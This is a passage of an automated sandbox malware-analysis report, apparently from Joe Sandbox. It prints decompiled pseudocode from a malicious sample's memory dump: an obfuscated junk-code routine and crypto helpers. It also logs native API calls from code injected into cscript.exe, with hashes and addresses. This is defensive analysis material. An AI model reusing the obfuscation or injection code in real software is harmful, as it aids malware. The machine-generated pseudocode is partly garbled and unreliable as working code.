String ID:
API String ID:
Opcode ID: 2f706ea2a60568170ea7fdba9a09e44a2211893fc25fbc3835ac8f3a8eefbbb4
Instruction ID: 47b6b7b8a267af5d7333d91ed6305da4f490c75b012061335d8e38adc2189f26
Opcode Fuzzy Hash: 2f706ea2a60568170ea7fdba9a09e44a2211893fc25fbc3835ac8f3a8eefbbb4
Instruction Fuzzy Hash: B2811F3694D3C1EFEB06DB38D8A6B523F71FB56324708028DC9914B2D2D774216ACB85

Uniqueness

Uniqueness Score: -1.00%

Function 0121C9B9, Relevance: .2, Instructions: 150
COMMONCrypto

Download Yara Rule

C-Code - Quality: 48%

			E0121C9B9(signed int __eax, signed int __ebx, signed char __ecx, signed char __edx, void* __edi, signed int __esi) {
				char _v3;
				void* _t21;
				signed int _t22;
				signed int _t26;
				signed char _t45;
				signed int _t54;
				signed int _t58;

				_t54 = __esi;
				_t45 = __edx;
				_t37 = __ecx;
				_t26 = __ebx;
				_t20 = __eax;
				_t58 = 0x93b70016;
				goto L1;
				do {
					do {
						do {
							do {
								do {
									L1:
									_t37 = _t37 |  *0x939ff7b7;
									 *0x8f83e7b0 =  *0x8f83e7b0 & _t20;
								} while ( *0x8f83e7b0 == 0);
								 *0xdc624d74 =  *0xdc624d74 << 0x2f;
								asm("sbb [0xc419e217], ecx");
								_push( *0x84e5c4bb);
							} while ( *0xdc624d74 != 0);
							 *0xdd634e75 =  *0xdd634e75 & _t37;
							_t45 = _t45 | 0x00000018;
							 *0x73aeb002 =  *0x73aeb002 >> 0x28;
							_t20 = _t20 &  *0xace77cd1;
							 *0xef4544a1 =  *0xef4544a1 & _t26;
							_pop( *0x2f9d1616);
							asm("sbb [0xc1ddbd1c], dl");
							 *0xa8e0cc32 = _t26;
							asm("sbb ebp, [0xefca2585]");
							asm("sbb [0xe0cc32b2], bl");
							asm("rol byte [0xa616efa8], 0xcf");
							_push(0xcc32c1da);
							 *0x16efa8e0 =  *0x16efa8e0 ^ _t26;
							 *0x7775c839 = _t26;
							_t26 =  *0x7775c839 |  *0xc4a80099;
							asm("sbb ch, [0xef45d8a8]");
							 *0x98b7a16 =  *0x98b7a16 + _t20;
							 *0xa8e0cc32 =  *0xa8e0cc32 | _t37;
							_t37 = 0xc83816ef;
						} while ( *0xa8e0cc32 != 0);
						_t21 = _t20 + 1;
						_push(_t21);
						asm("rcl dword [0xef45d88d], 0x2");
						asm("ror byte [0x4052173a], 0xc3");
						_push(_t21);
						 *0xef45d88d = _t26 ^ 0x52173a7b;
						 *0x81c42916 =  *0x81c42916 << 0xb7;
						asm("ror byte [0x4052173a], 0x7d");
						asm("sbb [0xef45d88d], edi");
						asm("adc edx, [0x9cba1d16]");
						_t22 = _t21;
						 *0xef45d88d =  *0xef45d88d << 0x2c;
						asm("ror dword [0x87dbae16], 0x53");
						asm("adc dl, [0xe7553110]");
						asm("sbb [0x2b16efa8], al");
						asm("sbb ecx, [0xcc32c1ef]");
						asm("adc [0x17ff2f8a], bl");
						_push( *0xefa8e0cc);
						 *0xa8e0cc32 =  *0xa8e0cc32 >> 0x75;
						 *0x34f216ef =  *0x34f216ef | _t58;
						 *0x2116efa8 =  *0x2116efa8 >> 0xf5;
						 *0x16d24939 =  *0x16d24939 << 0xb9;
						asm("sbb esp, [0x9076a2f7]");
						asm("stosb");
						 *0x5f828ee2 =  *0x5f828ee2 >> 0x67;
						 *0x140b36b6 =  *0x140b36b6 >> 0x25;
						 *0xefa8e0cc =  *0xefa8e0cc >> 0x38;
						asm("adc edx, [0x9e8e16ef]");
						asm("sbb [0xe0cc32c1], ecx");
						 *0xf2ba16ef =  *0xf2ba16ef >> 1;
						_t45 =  *0xf9af869a;
						 *0xf9af869a =  *0xd9b004fa +  *0x8ce2a816;
						 *0x395fc3cc =  *0x395fc3cc + (_t22 |  *0x32ccebb8) + 0xa8;
						asm("adc dh, [0x416efa8]");
						_push( *0xbda7983e);
						 *0x71c621c =  *0x71c621c - _t45;
						asm("movsb");
						_t58 =  *0xcc32c1db;
						 *0x16efa8e0 =  *0x16efa8e0 | _t45;
						 *0xc4a8009a =  *0xc4a8009a >> 0xd5;
						asm("sbb [0xef45d8a8], dl");
						_t20 = 0xa0f4be16;
						 *0x49395fa8 =  *0x49395fa8 >> 0xe0;
						asm("adc ch, [0x947a16d2]");
						_pop( *0xdec32e33);
						asm("sbb esi, [0xe0cc32c1]");
						asm("sbb [0xecc9b4a0], ch");
						asm("sbb esi, [0x395fc2cc]");
						_t37 = 0xffffffffab6e6925;
						asm("rcl dword [0xcdc48616], 0x7e");
						_t54 = (_t54 |  *0xc5f7c62b) &  *0xefa8e0cc;
						_t26 = (( *0x16d24939 |  *0xa8e0cc32) &  *0x5fbed3f5) - 0xd1;
					} while (_t26 < 0);
					_push( *0xaf88ac70);
					asm("adc dl, [0x54942410]");
					 *0xaddd0fb4 =  *0xaddd0fb4 ^ _t45;
					_t58 = _t58 ^ 0xef45d88d;
					_t26 = _t26 &  *0x90e04c16;
				} while (_t26 > 0);
				asm("rol dword [0xa8008977], 0xef");
				 *0x45d8a8c4 =  *0x45d8a8c4 + _t26;
				asm("rcr byte [0x8f16ef88], 1");
				 *0x826380d6 =  *0x826380d6 + 0x93b70016;
				asm("sbb bh, 0x0");
				 *0x121f16ef =  &_v3;
				asm("adc esp, [0xf9e2bbc]");
				 *0x4b16ef88 =  *0x4b16ef88 | 0xa0f4be16;
				_push(0x5fc2ccf0);
				return 0xa0f4be16;
			}

0x0121c9b9
0x0121c9b9
0x0121c9b9
0x0121c9b9
0x0121c9b9
0x0121c9ba
0x0121c9ba
0x0121c9bc
0x0121c9bc
0x0121c9bc
0x0121c9bc
0x0121c9bc
0x0121c9bc
0x0121c9bc
0x0121c9c2
0x0121c9c2
0x0121c9ca
0x0121c9d1
0x0121c9d7
0x0121c9d7
0x0121c9e0
0x0121c9e6
0x0121c9e9
0x0121c9f0
0x0121c9f6
0x0121c9fc
0x0121ca02
0x0121ca08
0x0121ca14
0x0121ca1a
0x0121ca20
0x0121ca2d
0x0121ca32
0x0121ca38
0x0121ca3e
0x0121ca44
0x0121ca4a
0x0121ca56
0x0121ca5c
0x0121ca5c
0x0121ca6d
0x0121ca6e
0x0121ca6f
0x0121ca7c
0x0121ca83
0x0121ca84
0x0121ca8a
0x0121ca91
0x0121ca99
0x0121ca9f
0x0121caa5
0x0121caac
0x0121cab3
0x0121caba
0x0121cad8
0x0121cae4
0x0121caf0
0x0121cafb
0x0121cb0d
0x0121cb14
0x0121cb26
0x0121cb39
0x0121cb40
0x0121cb46
0x0121cb47
0x0121cb54
0x0121cb61
0x0121cb7a
0x0121cb85
0x0121cb8e
0x0121cb94
0x0121cb94
0x0121cb9a
0x0121cbb3
0x0121cbb9
0x0121cbcb
0x0121cbd1
0x0121cbd2
0x0121cbd8
0x0121cbe4
0x0121cbeb
0x0121cbf1
0x0121cbfc
0x0121cc03
0x0121cc09
0x0121cc0f
0x0121cc1c
0x0121cc22
0x0121cc28
0x0121cc2c
0x0121cc3c
0x0121cc48
0x0121cc48
0x0121cc4f
0x0121cc5c
0x0121cc62
0x0121cc68
0x0121cc6e
0x0121cc6e
0x0121cc7a
0x0121cc81
0x0121cc99
0x0121cc9f
0x0121cca5
0x0121ccaf
0x0121ccb5
0x0121ccc1
0x0121cccd
0x0121ccde

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a267becafcdf5ddbbca7d32974d28df3129f9e4cdc96baa79e44af80670f1a1b
Instruction ID: 4049ad9ce5d02fea038dd33b740bc645076866edbff4c3f5ead2442b57b47db1
Opcode Fuzzy Hash: a267becafcdf5ddbbca7d32974d28df3129f9e4cdc96baa79e44af80670f1a1b
Instruction Fuzzy Hash: 1771003694D3C1EFEB06DB38D8A6B523F71FB56324708028DC9910B2D2D7742169CB85

Uniqueness

Uniqueness Score: -1.00%

Function 01201030, Relevance: .1, Instructions: 108
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E01201030(void* __eax) {
				void* _t41;
				unsigned int _t69;
				unsigned int _t77;
				signed int _t85;
				signed char _t99;
				signed char _t102;
				intOrPtr _t105;
				signed int _t120;

				_t41 = __eax;
				_t69 = (((( *(__eax + 0xc) & 0x000000ff) << 0x00000008 |  *(__eax + 0xd) & 0x000000ff) & 0x0000ffff) << 0x00000008 |  *(__eax + 0xe) & 0xff) << 0x00000007 | ( *(__eax + 0xf) & 0x000000ff) >> 0x00000001;
				_t99 =  *((intOrPtr*)(__eax + 0xb));
				if((_t99 & 0x00000001) != 0) {
					_t69 = _t69 | 0x80000000;
				}
				 *((char*)(_t41 + 0xc)) = _t69 >> 0x18;
				 *(_t41 + 0xf) = _t69;
				 *((char*)(_t41 + 0xd)) = _t69 >> 0x10;
				_t77 = (((( *(_t41 + 8) & 0x000000ff) << 0x00000008 |  *(_t41 + 9) & 0x000000ff) & 0x0000ffff) << 0x00000008 |  *(_t41 + 0xa) & 0xff) << 0x00000007 | (_t99 & 0x000000ff) >> 0x00000001;
				_t102 =  *((intOrPtr*)(_t41 + 7));
				 *((char*)(_t41 + 0xe)) = _t69 >> 8;
				if((_t102 & 0x00000001) != 0) {
					_t77 = _t77 | 0x80000000;
				}
				 *(_t41 + 8) = _t77 >> 0x18;
				 *(_t41 + 0xb) = _t77;
				 *(_t41 + 9) = _t77 >> 0x10;
				_t120 =  *(_t41 + 6) & 0xff;
				_t85 = (((( *(_t41 + 4) & 0x000000ff) << 0x00000008 |  *(_t41 + 5) & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t120) << 0x00000007 | (_t102 & 0x000000ff) >> 0x00000001;
				_t105 =  *((intOrPtr*)(_t41 + 3));
				 *(_t41 + 0xa) = _t77 >> 8;
				 *((intOrPtr*)(_t120 + _t41 - 0x7f)) =  *((intOrPtr*)(_t120 + _t41 - 0x7f)) + _t120;
			}

0x01201030
0x0120105b
0x0120105d
0x01201063
0x01201065
0x01201065
0x01201071
0x01201076
0x0120107c
0x012010ac
0x012010ae
0x012010b4
0x012010ba
0x012010bc
0x012010bc
0x012010cb
0x012010d0
0x012010d6
0x012010f1
0x01201101
0x01201103
0x01201109
0x0120110e

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
Instruction ID: 69d98ba6899e8fabefe96bd4c2623823e8f2031c93af0168c40e20b98bfa9554
Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
Instruction Fuzzy Hash: AC3182116586F10DD30E836D08BD675AEC28E9720174EC2FEDADA5F2F3C0888418D3A1

Uniqueness

Uniqueness Score: -1.00%

Function 01201174, Relevance: .1, Instructions: 96
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E01201174(void* __eax, signed int __ecx, signed int* __esi, intOrPtr _a8) {
				signed int _v1;
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed char _v16;
				intOrPtr _v20;
				signed int _v117;
				signed char _t47;
				intOrPtr _t49;
				void* _t51;
				signed int _t52;
				signed int _t73;
				signed char _t75;
				signed int _t87;

				_t89 = __esi;
				_t61 = __ecx;
				asm("sbb eax, 0x9d958c23");
				_t47 = __eax - 1;
				if(_t47 >= 0) {
					L7:
					_v12 = _t73;
					_v8 = _t47 | 0x00000053;
					_v4 = _t61;
					_t52 = 0;
					__eflags = 0;
					do {
						_t87 = 7;
						do {
							_t49 = _a8;
							_t75 = 1 << _t87;
							__eflags =  *(_t52 + _t49) & _t75;
							if(( *(_t52 + _t49) & _t75) != 0) {
								 *_t89 =  *_t89 ^ _v16;
								_t89[1] = _t89[1] ^ _v12;
								_t89[2] = _t89[2] ^ _v8;
								_t38 =  &(_t89[3]);
								 *_t38 = _t89[3] ^ _v4;
								__eflags =  *_t38;
							}
							__eflags = _v1 & 0x00000001;
							if((_v1 & 0x00000001) == 0) {
								_t51 = E01201030( &_v16);
							} else {
								_t51 = E01201030( &_v16);
								_v16 = _v16 ^ 0x000000e1;
							}
							_t87 = _t87 - 1;
							__eflags = _t87 - 0xffffffff;
						} while (_t87 > 0xffffffff);
						_t52 = _t52 + 1;
						__eflags = _t52 - 0x10;
					} while (_t52 < 0x10);
					return _t51;
				} else {
					if(__eflags < 0) {
						 *((intOrPtr*)(__esi + _t47 - 0x7f)) =  *((intOrPtr*)(__esi + _t47 - 0x7f)) + __esi;
					} else {
						_v117 =  !_v117;
						__ebp = __esp;
						__esp = __esp - 0x10;
						__eax = 0;
						__eflags = 0;
						 *__esi = 0;
						 *((intOrPtr*)(__esi + 4)) = 0;
						 *((intOrPtr*)(__esi + 8)) = 0;
						 *((intOrPtr*)(__esi + 0xc)) = 0;
						__eax =  *__ecx;
						_v20 =  *__ecx;
						__eax =  *((intOrPtr*)(__ecx + 8));
						__ecx =  *((intOrPtr*)(__ecx + 0xc));
						goto L7;
					}
				}
			}

0x01201174
0x01201174
0x01201174
0x01201179
0x0120117a
0x012011a0
0x012011a3
0x012011a6
0x012011a9
0x012011ac
0x012011ac
0x012011b0
0x012011b0
0x012011b5
0x012011b5
0x012011bf
0x012011c1
0x012011c4
0x012011c9
0x012011ce
0x012011d7
0x012011da
0x012011da
0x012011da
0x012011da
0x012011dd
0x012011e4
0x012011f1
0x012011e6
0x012011e6
0x012011eb
0x012011eb
0x012011f6
0x012011f7
0x012011f7
0x012011fc
0x012011fd
0x012011fd
0x01201207
0x0120117c
0x0120117c
0x0120110e
0x0120117e
0x0120117f
0x01201181
0x01201183
0x01201186
0x01201186
0x01201188
0x0120118a
0x0120118d
0x01201190
0x01201193
0x01201198
0x0120119b
0x0120119e
0x00000000
0x0120119e
0x0120117c

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c81079c8ff03391d29b1a051685b7d58447383b8f467eea56451b24157bff90
Instruction ID: d843ce3839d08bce62a5265aa98d925989bcfdd972c006b4a612ae11892460ed
Opcode Fuzzy Hash: 2c81079c8ff03391d29b1a051685b7d58447383b8f467eea56451b24157bff90
Instruction Fuzzy Hash: 1D31E231A197858FC70DCB7DC48056AFFE1EF9A210759C6AEC99A9B3E3C2718815CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01206AB4, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 454cb3cfb653e62d332661497973adc29d38f4ac49ee0d4ff5ce2d89773c9805
Instruction ID: 2d161faaa6ad011ddd2650e6bbe2b8ea851b067f54247430402bf591657942e3
Opcode Fuzzy Hash: 454cb3cfb653e62d332661497973adc29d38f4ac49ee0d4ff5ce2d89773c9805
Instruction Fuzzy Hash: 19C01233A0A0440BE2288E0EF8822F0F364E343230F242267E819A3A808682D5A641C9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cscript.exe PID: 6156 Parent PID: 5700 cscript.exeCOMMON

Execution Graph

Execution Coverage:	4.6%
Dynamic/Decrypted Code Coverage:	2.1%
Signature Coverage:	0%
Total number of Nodes:	674
Total number of Limit Nodes:	80

Executed Functions

Function 010E85CA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,010E3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,010E3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 010E861D

Strings

.z`, xrefs: 010E860D, 010E8618
=U, xrefs: 010E85CC

Memory Dump Source

Source File: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, Offset: 010D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_10d0000_cscript.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`$=U
API String ID: 823142352-2050847675
Opcode ID: bfed53677daf4ceab29e524a8f746c92c950c8973f9baba5c280f11b071fc58c
Instruction ID: cb1fc7024eec52945e1306be7c2d0ae40b5cae14102f4d55894024dcd0f0ae89
Opcode Fuzzy Hash: bfed53677daf4ceab29e524a8f746c92c950c8973f9baba5c280f11b071fc58c
Instruction Fuzzy Hash: 6C01B2B2204108AFCB48CF98DC85EEB77A9AF8C754F158648FA1D97240C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 010E85D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,010E3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,010E3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 010E861D

Strings

.z`, xrefs: 010E860D, 010E8618

Memory Dump Source

Source File: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, Offset: 010D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_10d0000_cscript.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 081deb7e9c098cdef1e8c39b03372dce6ccfd8fb37a5ca1b2a49ae1afd680529
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: DDF0BDB2200208AFCB08CF89DC84EEB77EDAF8C754F158248BA0D97240C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 010E867C, Relevance: 1.5, APIs: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(010E3D62,5E972F65,FFFFFFFF,010E3A21,?,?,010E3D62,?,010E3A21,FFFFFFFF,5E972F65,010E3D62,?,00000000), ref: 010E86C5

Memory Dump Source

Source File: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, Offset: 010D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_10d0000_cscript.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: d9db849bb7192f382631b99b11e1b2a823885a3584e184650a985a5bd4d33c2f
Instruction ID: 9a1379cddf430993065f15e42e6b341642163be9defdcdf5c71eb96b666ccdfa
Opcode Fuzzy Hash: d9db849bb7192f382631b99b11e1b2a823885a3584e184650a985a5bd4d33c2f
Instruction Fuzzy Hash: BCF0F4B2200108AFCB18DF99CC84EEB77A9EF9C314F128248BE0D97240D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 010E8680, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(010E3D62,5E972F65,FFFFFFFF,010E3A21,?,?,010E3D62,?,010E3A21,FFFFFFFF,5E972F65,010E3D62,?,00000000), ref: 010E86C5

Memory Dump Source

Source File: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, Offset: 010D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_10d0000_cscript.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 4f8f814a5dc5a0a98acdc6785928a9e1ca18febe541c4ece915a93802a688335
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: D2F0A4B2200208AFCB18DF89DC84EEB77ADAF8C754F158648BE1D97241D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 010E87AA, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,010D2D11,00002000,00003000,00000004), ref: 010E87E9

Memory Dump Source

Source File: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, Offset: 010D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_10d0000_cscript.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: f8304e1d828c7eac84fa91f8d9edb7544baadb5e61f010702a0ebac90c9d4935
Instruction ID: 4589c8f7d6aad5f5995d4d7aade4264e9c40a5b1ea00fa1758af1b79a9bd65b0
Opcode Fuzzy Hash: f8304e1d828c7eac84fa91f8d9edb7544baadb5e61f010702a0ebac90c9d4935
Instruction Fuzzy Hash: F1F0F8B1600219AFDB14DF99CC85EEB77A9AF9C754F118648BE09A7241C630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 010E87B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,010D2D11,00002000,00003000,00000004), ref: 010E87E9

Memory Dump Source

Source File: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, Offset: 010D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_10d0000_cscript.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 451efefb2f67c91a8b778b227f230e4f8ac16893a2d1125315a77313dd1f90ff
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 0AF015B2200208AFCB18DF89CC84EEB77ADAF88654F118548BE0897241C630F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 010E8700, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(010E3D40,?,?,010E3D40,00000000,FFFFFFFF), ref: 010E8725

Memory Dump Source

Source File: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, Offset: 010D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_10d0000_cscript.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 0b31be490fa0b690dcf6ff583fbc25b7584df1d6f83afbfb1beff620a0cee4d5
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 8AD01776200218ABD714EB99CC89EE77BACEF48660F154499BA589B242C570FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 054F9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 054F954A

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d280164cffcdf800c705c9102f53885c1dcde32449c2405fc7f6970557f2472c
Instruction ID: 34f0841ec39124d5511cdfa69d92158727ac8abb0f5d087f6ce7358821f9785a
Opcode Fuzzy Hash: d280164cffcdf800c705c9102f53885c1dcde32449c2405fc7f6970557f2472c
Instruction Fuzzy Hash: D1900265251000030105A999074450700A6B7D53A1391D021F1005554CDAA188616161

Uniqueness

Uniqueness Score: -1.00%

Function 054F95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 054F95DA

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9bf20d269bfa704d712e76077755e41d4ac598c41e96e4c884df7f868f4a7ccb
Instruction ID: 729bd0a8f549cb301aa738dd34d5e06483948fd21bd1302c9b0e3d8b33e2c0aa
Opcode Fuzzy Hash: 9bf20d269bfa704d712e76077755e41d4ac598c41e96e4c884df7f868f4a7ccb
Instruction Fuzzy Hash: FF9002A124200003410575994454616406AB7E0251B91D021E1004594DC9A588917165

Uniqueness

Uniqueness Score: -1.00%

Function 054F9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 054F971A

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 50cb758d01a81316f05ed4571deee909adb850212a35a9bdd87330b588bd0d71
Instruction ID: 27029fa8a477984f82e66f2fa574ed993ef797ecf04a6fe2c4fa81a9d2c68a73
Opcode Fuzzy Hash: 50cb758d01a81316f05ed4571deee909adb850212a35a9bdd87330b588bd0d71
Instruction Fuzzy Hash: 0190027124100402D10069D954486460065B7E0351F91E011A5014559ECAE588917171

Uniqueness

Uniqueness Score: -1.00%

Function 054F9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 054F9FEA

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5103a0a33b92cdb088bedffee567fadaf4dbca859bbb7e93041a9cb69331ae5a
Instruction ID: 9768074ba0325f6414f79b258b54f3abd12a0585c63fd6429eacc265455b84e3
Opcode Fuzzy Hash: 5103a0a33b92cdb088bedffee567fadaf4dbca859bbb7e93041a9cb69331ae5a
Instruction Fuzzy Hash: AE90027135114402D110659984447060065B7D1251F91D411A081455CD8AD588917162

Uniqueness

Uniqueness Score: -1.00%

Function 054F9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 054F978A

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 266a6b78f42061ff3dd13b0a726f736ae556ff7d55b75bef7d797d1e2cfe61c4
Instruction ID: 537b26ea547843a54cc91fb86562d4c2b641c3950cbe42835f124be6a9b1e11a
Opcode Fuzzy Hash: 266a6b78f42061ff3dd13b0a726f736ae556ff7d55b75bef7d797d1e2cfe61c4
Instruction Fuzzy Hash: CB90026925300002D1807599544860A0065B7D1252FD1E415A000555CCCD9588696361

Uniqueness

Uniqueness Score: -1.00%

Function 054F9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 054F965A

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

